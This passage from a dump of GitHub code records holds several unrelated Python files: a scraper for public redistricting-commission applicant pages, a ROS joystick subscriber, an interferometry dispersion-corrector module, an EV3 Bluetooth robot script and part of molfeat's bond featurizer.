'{}/{}_applicants/'\n\nPAGES_TO_SCRAPE = ['congressional', 'legislative']\n\nTIMES_APPLIED_LOOKUP_FILE = 'times_applied.csv'\n\n\ndef gather_links(soup):\n ''' given a bs4 object, grab the table data '''\n data = []\n table = soup.find('table')\n rows = table.find_all('tr')[1:]\n for row in rows:\n cells = row.find_all('td')\n link = cells[0].a['href']\n added = cells[-1].text\n data.append({\n 'link': f'{BASE_URL}{link}',\n 'added': added\n })\n return data\n\n\ndef get_init_data(url):\n ''' get initial data from a search page:\n the first page of results and the\n number of pages to iterate through\n '''\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n p1data = gather_links(soup)\n max_pages_link = soup.find('a', string='Last »')['href']\n parsed_url = urlparse(max_pages_link)\n max_pages = int(parse_qs(parsed_url.query)['page'][0])\n return {\n 'p1data': p1data,\n 'max_pages': max_pages\n }\n\n\ndef download_pages():\n ''' cycle through both apps and download the pages\n linked to from all the search pages -- also\n creates an intermediary file to keep track of\n the times when people submitted their applications\n '''\n\n # open the file and write the headers\n talf_out = open(TIMES_APPLIED_LOOKUP_FILE, 'w')\n headers = ['commission_type', 'id', 'time_applied']\n writer = csv.DictWriter(talf_out, fieldnames=headers)\n writer.writeheader()\n\n # loop over the commission type directories\n for page in PAGES_TO_SCRAPE:\n\n # build the URL\n url = URL_PATTERN.format(\n BASE_URL,\n page\n )\n\n # fetch initial data\n init_data = get_init_data(url)\n links = init_data['p1data']\n max_pages = init_data['max_pages']\n\n # hol up\n time.sleep(random.uniform(1, 2))\n\n # loop over the range of pages\n for page_no in range(2, max_pages+1):\n\n # grab the next page of search results with params\n r = requests.get(url, params={'page': page_no})\n\n # soup the HTML and call the extraction function\n soup = BeautifulSoup(r.text, 'html.parser')\n new_links = gather_links(soup)\n\n # add to the running list of detail links\n links = links + new_links\n\n # just a sec k\n time.sleep(random.uniform(1, 2))\n\n # now, loop over the detail page links\n for link in links:\n\n # get the applicant's ID number\n applicant_id = link['link'].split('/')[-1]\n\n # and reformat the application date to ISO 8601\n datetime_applied = datetime.strptime(\n link['added'].replace(' UTC', ''),\n '%Y-%m-%d %H:%M:%S %z'\n ).isoformat() + 'Z'\n\n # write timestamp data to file\n writer.writerow({\n 'commission_type': page,\n 'id': applicant_id,\n 'time_applied': datetime_applied\n })\n\n # make a file path to the HTML file\n filepath = os.path.join(\n THIS_DIR,\n page,\n applicant_id\n ) + '.html'\n\n # check if we've already downloaded this one\n if not os.path.isfile(filepath):\n\n # if not, grab the detail page\n detail_page = requests.get(link['link'])\n\n # write it to file\n with open(f'{filepath}', 'w') as outfile:\n outfile.write(detail_page.text)\n\n # holler at us\n print(f'Wrote {filepath}')\n\n # won't take but a moment\n time.sleep(random.uniform(1, 2))\n\n # close the file yo\n talf_out.close()\n\n\nif __name__ == '__main__':\n download_pages()\n","repo_name":"cjwinchester/co-redistricting-commission-applicants","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72887631450","text":"#!/usr/bin/env python\nfrom common import RosSubscriber\nfrom sensor_msgs.msg import Joy\n\nclass JoystickSubscriber(RosSubscriber):\n def _setup(self):\n self.msg = Joy\n\n def _make_dic(self, msg):\n dict = {}\n for i in range(len(msg.axes)):\n n = \"axes\"+str(i)\n v = msg.axes[i]\n dict[n] = v\n for i in range(len(msg.buttons)):\n n = \"buttons\"+str(i)\n v = msg.buttons[i]\n dict[n] = v\n return dict\n\ndef setup(robot):\n robot.add_subscriber(JoystickSubscriber(u\"joy\"))\n","repo_name":"EiichiroIto/ros_rsp_server","sub_path":"scripts/robot/joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7851104635","text":"import numpy as np\n#from sympy.functions.elementary.piecewise import Piecewise\n#from kernuller import mas2rad, rad2mas\n#from . import utilities\nfrom . import n_air\n#from astropy import constants\n#from astropy import units\nimport scipy.interpolate as interp\nfrom pathlib import Path\n\n\n\nparent = Path(__file__).parent.absolute()\nznse_file = parent/\"data/znse_index.csv\"\n\n# Brute force test parameter to \nthetas = np.linspace(-np.pi, np.pi, 10000)\ncomphasor = np.ones(4)[None,:]*np.exp(1j*thetas[:,None])\n\n# Utility functions for optimization\n##################################################\n\nfrom lmfit import Parameters, minimize\ndef extract_corrector_params(corrector, params):\n \"\"\"\n Utility function to reconstruct the *b* and *c*\n vectors from the lmfit Parameters object.\n \n **Parameters:**\n \n * corrector : The corrector object\n * params : at lmfit Parameters object\n containing b_i and c_i terms\n \"\"\"\n \n ntel = corrector.b.shape[0]\n bvec = np.zeros_like(corrector.b)\n cvec = np.zeros_like(corrector.c)\n for i in range(ntel):\n bvec[i] = params[\"b%d\"%(i)]\n cvec[i] = params[\"c%d\"%(i)]\n return bvec,cvec\n\n\ndef get_depth(combiner, Is,):\n \"\"\"\n Computes a \"null depth\" analogue (dark/bright)\n to be minimized by the tuning method.\n The masks in the combiner definition\n are used to determine the role of the different outputs.\n \n **Parameters:**\n \n * combiner : A combiner object.\n * Is : An array of intensities\n \n .. admonition: Note:\n \n This definition might need some adjustments for\n use in kernel-nullers?\n \"\"\"\n bright = Is[:,combiner.bright].sum(axis=1)\n dark = Is[:,combiner.dark].sum(axis=1)\n res = (dark/bright)\n return res\n\ndef get_Is(params, combiner, corrector, lambs):\n \"\"\"\n Returns intensities at the combiners' outputs\n taking into account the corrections provided in\n params.\n \n **dcomp is computed automatically be default.**\n \n **Parameters:**\n \n * params : either\n \n - A Parameters object from the optimization\n - A tuple of vectors bvec, cvec\n \n * combiner : A combiner object.\n * corrector : The corrector object\n * lambs : The wavelengths considered.\n \"\"\"\n \n if isinstance(params, Parameters):\n bvec, cvec = extract_corrector_params(corrector, params)\n else:\n bvec, cvec = params\n phasor = corrector.get_phasor_from_params(lambs, \n a=None,\n b=bvec,\n c=cvec)\n #res = combiner.Mcn.dot(phasor)\n res = np.einsum(\"ikj,ij->ik\", combiner.Mcn, phasor)\n Is = np.abs(res)**2\n return Is\n\n\ndef get_contrast_res(params, combiner, corrector, lambs):\n \"\"\"\n Macro that gets the a residual from parameters \n for minimizing method.\n \"\"\"\n Is = get_Is(params, combiner, corrector, lambs)\n res = get_depth(combiner, Is)\n return res\n\n\ndef get_es(params, combiner, corrector, lambs):\n \"\"\"\n Returns the enantiomorph excursion taking into account the corrections provided in\n params.\n \n **Currently works only for double-bracewell 3-4 architecures**\n \n **dcomp is computed automatically by default.**\n \n **Parameters:**\n \n - params : either\n * A Parameters object from the optimization\n * A tuple of vectors bvec, cvec\n - combiner : A combiner object.\n - corrector : The corrector object\n - lambs : The wavelengths considered.\n \"\"\"\n \n if isinstance(params, Parameters):\n bvec, cvec = extract_corrector_params(corrector, params)\n else:\n bvec, cvec = params\n phasor = corrector.get_phasor_from_params(lambs, \n a=None,\n b=bvec,\n c=cvec)\n thetas = np.linspace(-np.pi, np.pi, 10000)\n comphasor = np.ones(4)[None,:]*np.exp(1j*thetas[:,None])\n amatcomp = np.einsum(\"ijk, ik -> ijk\", combiner.Mcn, phasor)\n allcor = np.einsum(\"ik, mk -> mik\", amatcomp[:,3,:], comphasor) - np.conjugate(amatcomp[:, 4,:])[None,:,:]\n excursion = np.min(np.linalg.norm(allcor, axis=2), axis=0)\n \n return excursion\ndef get_shape_res(params, combiner, corrector, lambs):\n \"\"\"\n Macro that gets the a residual from parameters \n for minimizing method.\n \"\"\"\n res = get_es(params, combiner, corrector, lambs)\n return res\n\n\nclass corrector(object):\n def __init__(self, config, lambs, file=None):\n \"\"\"\n A module that provides beam adjustments\n for the input. It contains amplitude *a*, geometric\n piston *b* and ZnSe piston substitution *c*. Note that\n the ZnSe length replaces some air length.\n \n **Parameters:**\n \n * config: A parsed config file\n * lambs : The wavelength channels to consider [m]\n (At the __init__ stage, it is only used for\n the computation of a mean refractive index for\n the dispersive material)\n * file A file containing the plate index\n \n **Internal parameters:**\n \n * a : Vector of the amplitude term\n * b : Vetor of the geometric piston term [m]\n * c : Vetor of the dispersive piston term [m]\n \"\"\"\n self.config = config\n if file is None:\n nplate_file = np.loadtxt(znse_file,delimiter=\";\")\n else: \n nplate_file = file\n self.nplate = interp.interp1d(nplate_file[:,0]*1e-6, nplate_file[:,1],\n kind=\"linear\", bounds_error=False )\n diams = self.config.getarray(\"configuration\", \"diam\")\n n_tel = diams.shape[0]\n # An amplitude factor\n self.a = np.ones(n_tel)\n self.b = np.zeros(n_tel)\n self.c = np.zeros(n_tel)\n self.nmean= np.mean(self.nplate(lambs))\n self.dcomp = -(self.nmean-1)*self.c\n \n self.prediction_model = n_air.wet_atmo(config)\n \n \n def get_phasor(self, lambs):\n \"\"\"\n Returns the complex phasor corresponding\n to the current a, b, c, and dcomp phasors.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n \n **Returns:** alpha\n \"\"\"\n ns = self.nplate(lambs)\n alpha = self.a[None,:]*np.exp(-1j*2*np.pi/lambs[:,None]*(self.b[None,:]+self.dcomp[None,:] +self.c[None,:]*(ns[:,None]-1)))\n return alpha\n def get_phasor_s(self, lambs):\n \"\"\"\n Deprecated\n \"\"\"\n ns = self.nplate(lambs)\n alpha = self.a*np.exp(-1j*2*np.pi/lambs*(self.b + self.dcomp +self.c*(ns-1)))\n return alpha\n def get_raw_phase_correction(self, lambs, b=0,c=0, dcomp=0, model=None):\n \"\"\"\n Returns the raw (non-wrapped) phase produced by an optical path\n of b[m] in air and c[m] in plate material.\n \n **Parameters**\n \n * lambs : The wavelength channels to consider [m]\n * a : Vector of the amplitude term\n * b : Vetor of the geometric piston term [m]\n * c : Vetor of the dispersive piston term [m]\n * dcomp : A length of air to compensate for the plate\n \n \n \"\"\"\n if model is None:\n model = self.prediction_model\n nair = model.get_Nair(lambs, add=1)\n nplate = self.nplate(lambs)\n return 2*np.pi/lambs*(nair*b + nplate*c)\n def get_dcomp(self, c):\n \"\"\"\n Returns the theoertical value of dcomp for a given value of compensator\n plate, to correct for the pure piston term introduced.\n \"\"\"\n dcomp = -(self.nmean-1)*c\n return dcomp\n \n def get_phasor_from_params(self, lambs, a=None,\n b=None, c=None,\n dcomp=None):\n \"\"\"\n Similar to get_phasor() but allows to provide the\n parameters as arguments (slower).\n \n Returns the complex phasor corresponding\n to the current a, b, c, and dcomp phasors.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * a : Vector of the amplitude term\n * b : Vetor of the geometric piston term [m]\n * c : Vetor of the dispersive piston term [m]\n \"\"\"\n ns = self.nplate(lambs)\n if a is None:\n a = self.a\n if b is None:\n b = self.b\n if c is None:\n c = self.c\n if dcomp is None:\n dcomp = self.get_dcomp(c)\n alpha = a[None,:]*np.exp(-1j*2*np.pi/lambs[:,None]*(b[None,:] + dcomp[None,:] +c[None,:]*(ns[:,None]-1)))\n return alpha\n \n def theoretical_phase(self,lambs, proj_opds, model=None, add=1):\n \"\"\"\n Computes the theoretical chromatic phase effect of the\n array geometry projected on axis based on the wet atmosphere\n model.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * proj_opds : The projected piston obtained by projection\n (Get from simulator.obs.get_projected_geometric_pistons)\n * model : A model for humid air (see n_air.wet_atmo object).\n If None, defaults to self.model, created upon init.\n * add : returns n-1+add (add=0 gives the relative\n optical path compared to vacuum)\n \n **Returns:** phase\n \"\"\"\n nair = model.get_Nair(lambs, add=add)\n phase = 2*np.pi/lambs*nair*proj_opds\n return phase.T\n \n def solve_air(self, lambs, model):\n \"\"\"\n Computes a least squares compensation model (see\n **Koresko et al. 2003 DOI: 10.1117/12.458032**)\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * model : The wet atmosphere model (see n_air.wet_atmo object)\n \n **Returns:** :math:`\\Big( \\mathbf{A}^T\\mathbf{A}\\mathbf{A}^T \\Big)^{-1}`\n \"\"\"\n nair = model.get_Nair(lambs)\n ns = np.array([nair, self.nplate(lambs)]).T\n A = 2*np.pi/lambs[:,None] * ns\n \n self.S = np.linalg.inv(A.T.dot(A)).dot(A.T)\n return self.S\n \n def tune_static(self, lambs, combiner, apply=True,\n freeze_params=[\"b0\", \"c0\", \"b2\", \"c2\"]):\n \"\"\"\n Optimize the compensator to correct chromatism in the \n model of the combiner. Returns a lmfit solution object.\n If \"apply\" is set to True, a, b, c, and dcomp are also\n set to the best fit value.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * combiner : A combiner object (chromatic) \n * apply : Boolean deciding whether to set the local\n parameters to best fit value (default: True)\n * freeze_params : The name of parameters to be freezed.\n Should be used to account for the larger than\n necessary number of degrees of freedom.\n \n .. admonition:: Note:\n \n For obtaining a more practical direct results, some\n more complicated balancing guidelines should be followed.\n \"\"\"\n params = Parameters()\n for i in range(self.b.shape[0]):\n params.add(\"b%d\"%(i),value=0., min=-1.0e-3, max=1.0e-3, vary=True)\n params.add(\"c%d\"%(i),value=0., min=-1.0e-3, max=1.0e-3, vary=True)\n params[\"b0\"].vary = False\n params[\"c0\"].vary = False\n params[\"c2\"].vary = False\n params[\"b2\"].vary = False\n sol = minimize(get_contrast_res, params,\n args=(combiner, self, lambs),\n method=\"leastsq\")\n \n self.sol = sol\n if apply:\n bvec, cvec = extract_corrector_params(self, sol.params)\n self.b = bvec\n self.c = cvec\n self.dcomp = -(self.nmean-1)*self.c\n return sol\n \n def tune_static_shape(self, lambs, combiner, apply=True,\n sync_params=[(\"b3\", \"b2\", 0.),\n (\"c3\", \"c2\", 0.)],\n freeze_params=[\"b0\", \"c0\", \"b1\", \"c1\"]):\n \"\"\"\n Optimize the compensator to correct chromatism in the \n model of the combiner to obtain enantomporph combinations\n at the outputs. Returns a lmfit solution object.\n If ``apply`` is set to True, a, b, c, and dcomp are also\n set to the best fit value.\n \n **Currently only works for double Bracewell 3-4 architectures.**\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * combiner : A combiner object (chromatic) \n * apply : Boolean deciding whether to set the local\n parameters to best fit value (default: True)\n \n .. admonition:: Note:\n \n For obtaining a more practical direct results, some\n more complicated balancing guidelines should be followed.\n \n **Example:**\n \n .. code-block::\n \n sol = asim.corrector.tune_static_shape(asim.lambda_science_range,\n asim.combiner,\n sync_params=[(\"b3\", \"b2\", asim.corrector.b[3] - asim.corrector.b[2]),\n (\"c3\", \"c2\", asim.corrector.c[3] - asim.corrector.c[2])],\n apply=True)\n \n \"\"\"\n params = Parameters()\n print(\"inside_tuning\", self.b, self.c)\n for i in range(self.b.shape[0]):\n params.add(\"b%d\"%(i),value=self.b[i], min=-1.0e-3, max=1.0e-3, vary=True)\n params.add(\"c%d\"%(i),value=self.c[i], min=-1.0e-3, max=1.0e-3, vary=True)\n \n # Should do this in a loop for sync_params\n for tosync in sync_params:\n params[tosync[0]].set(expr=tosync[1]+f\"+ {tosync[2]}\")\n # If we have \n #b23 = self.b[3]-self.b[2]\n #c23 = self.c[3]-self.c[2]\n #params[\"b3\"].set(expr=f\"b2 + {b23}\")\n #params[\"c3\"].set(expr=f\"c2 + {c23}\")\n for aparam in freeze_params:\n params[aparam].set(vary=False)\n \n #display.display(params)\n sol = minimize(get_shape_res, params,\n args=(combiner, self, lambs),\n method=\"leastsq\")\n \n self.sol = sol\n if apply:\n bvec, cvec = extract_corrector_params(self, sol.params)\n self.b = bvec\n self.c = cvec\n self.dcomp = -(self.nmean-1)*self.c\n return sol\n \n \n \n \n \n ","repo_name":"rlaugier/SCIFYsim","sub_path":"scifysim/correctors.py","file_name":"correctors.py","file_ext":"py","file_size_in_byte":14920,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"38938503972","text":"\n\"\"\"\nfunkction for communication with bluetooth\n\n\"\"\"\n\ndef client(iMac, iData = \"test\", iPort=3):\n import socket\n\n # The MAC address of a Bluetooth adapter on the server.\n # The server might have multiple Bluetooth adapters.\n serverMACAddress = iMac\n port = iPort # port is an arbitrary choice. However, it must match the port used by the server.\n s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\n try:\n s.connect((serverMACAddress, port))\n text = iData\n s.send(bytes(text, 'UTF-8'))\n s.close()\n except:\n s.close()\n\n\n\ndef server(iMac, iPort=3, iBacklog=1, iSize=1024):\n import socket\n\n # The MAC address of a Bluetooth adapter on the server.\n # The server might have multiple Bluetooth adapters.\n hostMACAddress = iMac\n port = iPort # port is an arbitrary choice. However, it must match the port used by the client.\n backlog = iBacklog\n size = iSize\n s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\n s.bind((hostMACAddress, port))\n s.listen(backlog)\n try:\n client, address = s.accept()\n print(\"Socket is open\")\n while 1:\n data = client.recv(size)\n if data:\n print(\"Data ready\")\n client.send(data)\n except:\n print(\"Closing socket\")\n client.close()\n # data = 0\n s.close()\n return data\n\n\n\n\"\"\"\nCreated on Sun Jan 1 17:34:26 2017\n@author: jostp\n\"\"\"\n\n\ndef computeObjectPosition(iObjectWidthPx, iObjectXcoordPx, iObjectWidth=64, iFocalLength=215, iCamMaxAngle=38.65):\n '''\n Returns detected object's position in camera coordinate system, according to his width, and its center's x coordinate\n\n Parameters\n -----------\n iObjectWidthPx : int\n Object's width in pixels\n iObjectWidth : float\n Object's width in mm\n iObjectXcoordPx : int\n Object's x coordinate on camera in pixels\n iFocalLength : float\n Focal length of the camera in mm\n iCamMaxAngle : float\n Maximum camera vision angle in degrees\n\n Returns\n ----------\n np.array\n Computed postion (x,y) of object in camera coordinate system\n\n '''\n\n import numpy as np\n\n # compute object's distance from camera\n if iObjectWidthPx != 0:\n distance = iObjectWidth * iFocalLength / iObjectWidthPx\n else:\n distance = 0\n\n\n # compute object's angle to camera\n koef = -iCamMaxAngle / 128.0\n objectAngle = koef * (iObjectXcoordPx - 128)\n\n # compute object's coordinates\n oX = distance * np.cos(objectAngle * np.pi / 180)\n oY = distance * np.sin(objectAngle * np.pi / 180)\n\n\n return np.array((oX, oY))\n\n#########################################################################################################\n####################################### programm on EV3 ################################################\n#########################################################################################################\n\n\nimport time\nimport ev3dev.ev3 as ev3\n\npixy = ev3.Sensor('in1')\npixy.mode = 'ALL'\n\nm_left = ev3.LargeMotor('outB')\nm_right = ev3.LargeMotor('outC')\n\nbtn = ev3.Button()\n\n\nwhile not btn.any():\n\n dc_l = 20\n\n dc_r = 10\n\n # set motor speed values\n #m_left.run_direct(duty_cycle_sp=dc_l)\n #m_right.run_direct(duty_cycle_sp=dc_r)\n\n a = pixy.value(0)\n #b = pixy.value(1)\n c = pixy.value(2)\n #d = pixy.value(3)\n e = pixy.value(4)\n #f = pixy.value(5)\n\n pose = computeObjectPosition(e, c)\n\n aS = str(a)\n posX = str(pose[0])\n posY = str(pose[1])\n dcL = str(dc_l)\n dcR = str(dc_r)\n\n if len(aS) != 1:\n aS = \"0\"\n\n if len(dcL) == 1:\n dcL = \"00\" + dcL\n elif len(dcL) == 2:\n dcL = \"0\" + dcL\n else:\n dcL = dcL\n\n\n if len(dcR) == 1:\n dcR = \"00\" + dcR\n elif len(dcR) == 2:\n dcR = \"0\" + dcR\n else:\n dcR = dcR\n\n\n text = aS + dcL + dcR + '$' + posX + '$' + posY\n\n time.sleep(0.1)\n client('a4:db:30:56:59:71',text, 4)\n\n\n\n# stop both motors\n#m_left.stop()\n#m_right.stop()\n","repo_name":"jprevc/LegoPixy","sub_path":"EV3blockDet.py","file_name":"EV3blockDet.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"74880241050","text":"from typing import Union\nfrom typing import Callable\nfrom typing import Optional\nfrom typing import Dict\nfrom typing import Iterable\n\nfrom collections import defaultdict\n\nimport importlib\nimport inspect\nimport datamol as dm\nimport numpy as np\n\nfrom molfeat._version import __version__ as MOLFEAT_VERSION\nfrom molfeat.calc.base import SerializableCalculator\nfrom molfeat.calc._atom_bond_features import bond_type_one_hot\nfrom molfeat.calc._atom_bond_features import bond_is_conjugated\nfrom molfeat.calc._atom_bond_features import bond_is_in_ring\nfrom molfeat.calc._atom_bond_features import bond_direction_one_hot\nfrom molfeat.calc._atom_bond_features import bond_stereo_one_hot\nfrom molfeat.calc._atom_bond_features import pairwise_ring_membership\nfrom molfeat.calc._atom_bond_features import pairwise_2D_dist\nfrom molfeat.calc._atom_bond_features import pairwise_bond_indicator\nfrom molfeat.calc._atom_bond_features import pairwise_dist_indicator\nfrom molfeat.utils import datatype\nfrom molfeat.utils.commons import concat_dict\nfrom molfeat.utils.commons import hex_to_fn\nfrom molfeat.utils.commons import fn_to_hex\n\n\nclass BondCalculator(SerializableCalculator):\n \"\"\"\n A class for bond featurizer which loops over all bonds in a molecule and\n featurizes them with the ``featurizer_funcs``. The constructed graph is assumed to be\n a bi-directed graph by default.\n \"\"\"\n\n DEFAULT_FEATURIZER = {\n \"bond_type_one_hot\": bond_type_one_hot,\n \"bond_stereo_one_hot\": bond_stereo_one_hot,\n \"bond_is_in_ring\": bond_is_in_ring,\n \"bond_is_conjugated\": bond_is_conjugated,\n \"bond_direction_one_hot\": bond_direction_one_hot,\n }\n\n def __init__(\n self,\n featurizer_funcs: Union[list, dict] = None,\n self_loop: bool = False,\n concat: bool = True,\n name: str = \"he\",\n ):\n \"\"\"\n Init function of the bond property calculator\n\n Args:\n featurizer_funcs: Mapping feature name to the featurization function.\n self_loop: Whether self loops will be added. Default to False. If True, an additional\n column of binary values to indicate the identity of self loops will be added.\n The other features of the self loops will be zero.\n concat: Whether to concat all the data into a single value in the output dict\n name: Name of the key name of the concatenated features\n \"\"\"\n self._input_kwargs = locals().copy()\n self._input_kwargs.pop(\"self\")\n # remove featurizer_funcs too\n self._input_kwargs.pop(\"featurizer_funcs\", None)\n self._toy_mol = dm.to_mol(\"CO\")\n self._feat_sizes = dict()\n if featurizer_funcs is None:\n featurizer_funcs = self.DEFAULT_FEATURIZER\n if not isinstance(featurizer_funcs, dict):\n get_name = lambda x: getattr(x, \"__name__\", repr(x))\n featurizer_funcs = dict((get_name(x), x) for x in featurizer_funcs)\n self.featurizer_funcs = featurizer_funcs\n self._self_loop = self_loop\n self.concat = concat\n self.name = name\n for k in self.featurizer_funcs.keys():\n self.feat_size(feat_name=k)\n if self._self_loop:\n self._feat_sizes[\"self_loop\"] = 1\n\n def to_state_dict(self):\n \"\"\"Convert the Atom calculator to a state dict\n Due to some constraints and cross-version compatibility, the featurizer functions\n need to be pickled and not just list\n \"\"\"\n state_dict = {}\n state_dict[\"name\"] = self.__class__.__name__\n state_dict[\"module\"] = self.__class__.__module__\n state_dict[\"args\"] = self._input_kwargs\n\n featurizer_fn_pickled = {}\n for fname, ffunc in self.featurizer_funcs.items():\n featurizer_fn_pickled[fname] = fn_to_hex(ffunc)\n state_dict[\"args\"][\"featurizer_funcs\"] = featurizer_fn_pickled\n state_dict[\"_molfeat_version\"] = MOLFEAT_VERSION\n signature = inspect.signature(self.__init__)\n val = {\n k: v.default\n for k, v in signature.parameters.items()\n # if v.default is not inspect.Parameter.empty\n }\n to_remove = [k for k in state_dict[\"args\"] if k not in val.keys()]\n for k in to_remove:\n state_dict[\"args\"].pop(k)\n return state_dict\n\n @classmethod\n def from_state_dict(cls, state_dict, override_args: Optional[dict] = None):\n \"\"\"Create an instance of an atom calculator from a state dict\n\n Args:\n state_dict: state dictionary to use to create the atom calculator\n override_args: optional dictionary of arguments to override the ones in the state dict\n at construction of the new object\n \"\"\"\n # EN: at this moment, version compatibility is not enforced\n cls_name = state_dict.get(\"name\", cls.__name__)\n module_name = state_dict.get(\"module\", cls.__module__)\n module = importlib.import_module(module_name)\n klass = getattr(module, cls_name)\n\n kwargs = state_dict[\"args\"].copy()\n # now we need to unpickle the featurizer functions\n featurizer_fn_pickled = kwargs.pop(\"featurizer_funcs\", None)\n if featurizer_fn_pickled is not None:\n featurizer_fn_loaded = {}\n for k, v in featurizer_fn_pickled.items():\n featurizer_fn_loaded[k] = hex_to_fn(v)\n kwargs[\"featurizer_funcs\"] = featurizer_fn_loaded\n kwargs.update(**(override_args or {}))\n return klass(**kwargs)\n\n def _concat(self, data_dict: Dict[str, Iterable]):\n \"\"\"Concatenate the data into a single value\n\n Args:\n data_dict: mapping of feature names to tensor/arrays\n Returns:\n concatenated_dict: a dict with a single key where all array have been concatenated\n \"\"\"\n return concat_dict(data_dict, new_name=self.name)\n\n def feat_size(self, feat_name: Optional[str] = None):\n \"\"\"Get the feature size for ``feat_name``.\n\n When there is only one feature, ``feat_name`` can be None.\n\n Args:\n feat_name: Feature for query.\n\n Returns:\n int: Feature size for the feature with name ``feat_name``. Default to None.\n \"\"\"\n if feat_name is None:\n assert (\n len(self.featurizer_funcs) == 1\n ), \"feat_name should be provided if there are more than one features\"\n feat_name = list(self.featurizer_funcs.keys())[0]\n\n if feat_name not in self.featurizer_funcs:\n raise ValueError(\n \"Expect feat_name to be in {}, got {}\".format(\n list(self.featurizer_funcs.keys()), feat_name\n )\n )\n if feat_name not in self._feat_sizes:\n bond = self._toy_mol.GetBondWithIdx(0)\n self._feat_sizes[feat_name] = len(self.featurizer_funcs[feat_name](bond))\n return self._feat_sizes[feat_name]\n\n def __len__(self):\n \"\"\"Get length of the property estimator\"\"\"\n return sum(v for k, v in self._feat_sizes.items() if k != self.name)\n\n def __call__(self, mol: Union[dm.Mol, str], dtype: Callable = None, **kwargs):\n \"\"\"Featurize all bonds in a molecule.\n\n Args:\n mol: the molecule of interest\n dtype: requested data type\n\n Returns:\n dict: For each function in self.featurizer_funcs with the key ``k``,\n store the computed feature under the key ``k``.\n \"\"\"\n mol = dm.to_mol(mol)\n num_bonds = mol.GetNumBonds()\n bond_features = defaultdict(list)\n\n # Compute features for each bond\n for i in range(num_bonds):\n bond = mol.GetBondWithIdx(i)\n for feat_name, feat_func in self.featurizer_funcs.items():\n feat = feat_func(bond)\n bond_features[feat_name].extend([feat, feat.copy()])\n\n # Stack the features and convert them to float arrays\n processed_features = dict()\n for feat_name, feat_list in bond_features.items():\n feat = np.stack(feat_list)\n processed_features[feat_name] = feat\n\n if self._self_loop and num_bonds > 0:\n num_atoms = mol.GetNumAtoms()\n for feat_name in processed_features:\n feats = processed_features[feat_name]\n # add a new label that says the feat are not self loop\n # feats = np.concatenate([feats, np.zeros((feats.shape[0], 1))], axis=1)\n # add a label at the last position that says it's a selfloop\n add_edges = np.zeros((num_atoms, feats.shape[1]))\n # self_loop_feats[:, -1] = 1\n feats = np.concatenate([feats, add_edges], axis=0)\n processed_features[feat_name] = feats\n self_loop_feats = np.concatenate(\n [np.zeros((num_bonds * 2, 1)), np.ones((num_atoms, 1))]\n )\n\n processed_features[\"self_loop\"] = self_loop_feats\n\n if self._self_loop and num_bonds == 0:\n num_atoms = mol.GetNumAtoms()\n old_concat = self.concat\n self.concat = False\n processed_features = self(self._toy_mol)\n self.concat = old_concat\n for feat_name in processed_features:\n feats = processed_features[feat_name]\n feats = np.zeros((num_atoms, feats.shape[1]))\n processed_features[feat_name] = feats\n if self.concat and (num_bonds > 0 or self._self_loop):\n processed_features = self._concat(processed_features)\n if dtype is not None:\n for feat_name, feat in processed_features.items():\n feat = datatype.cast(feat, dtype=dtype)\n processed_features[feat_name] = feat\n\n return processed_features\n\n\nclass EdgeMatCalculator(BondCalculator):\n \"\"\"Generate edge featurizer matrix\"\"\"\n\n DEFAULT_PAIRWISE_FEATURIZER = {\n \"pairwise_2D_dist\": pairwise_2D_dist,\n # \"pairwise_3D_dist\": pairwise_3D_dist,\n \"pairwise_ring_membership\": pairwise_ring_membership,\n }\n\n def __init__(\n self,\n featurizer_funcs: Union[list, dict] = None,\n pairwise_atom_funcs: Union[list, dict, str] = \"default\",\n name: str = \"he\",\n ):\n \"\"\"\n Init function of the edge matrix property calculator\n\n Args:\n featurizer_funcs: Mapping feature name to the featurization function.\n pairwise_atom_funcs: Mapping feature name to pairwise featurization function.\n Use the keywords \"default\" for the default values\n \"\"\"\n if pairwise_atom_funcs == \"default\":\n pairwise_atom_funcs = self.DEFAULT_PAIRWISE_FEATURIZER\n if not isinstance(pairwise_atom_funcs, dict):\n get_name = lambda x: getattr(x, \"__name__\", repr(x))\n pairwise_atom_funcs = dict((get_name(x), x) for x in pairwise_atom_funcs)\n self.pairwise_atom_funcs = pairwise_atom_funcs\n super().__init__(featurizer_funcs=featurizer_funcs, concat=True, name=name)\n # add conf data to toy mol\n self._toy_mol = dm.conformers.generate(self._toy_mol, n_confs=1, minimize_energy=False)\n for k in self.pairwise_atom_funcs.keys():\n self.feat_size(feat_name=k)\n\n def to_state_dict(self):\n \"\"\"Convert the Atom calculator to a state dict\n Due to some constraints and cross-version compatibility, the featurizer functions\n need to be pickled and not just list\n \"\"\"\n state_dict = super().to_state_dict()\n # repeat for the pairwise one\n pairwise_atom_fn_pickled = {}\n for fname, ffunc in self.pairwise_atom_funcs.items():\n pairwise_atom_fn_pickled[fname] = fn_to_hex(ffunc)\n state_dict[\"args\"][\"pairwise_atom_funcs\"] = pairwise_atom_fn_pickled\n return state_dict\n\n @classmethod\n def from_state_dict(cls, state_dict, override_args: Optional[dict] = None):\n \"\"\"Create an instance of an atom calculator from a state dict\n\n Args:\n state_dict: state dictionary to use to create the atom calculator\n override_args: optional dictionary of arguments to override the ones in the state dict\n at construction of the new object\n \"\"\"\n # EN: at this moment, version compatibility is not enforced\n cls_name = state_dict.get(\"name\", cls.__name__)\n module_name = state_dict.get(\"module\", cls.__module__)\n module = importlib.import_module(module_name)\n klass = getattr(module, 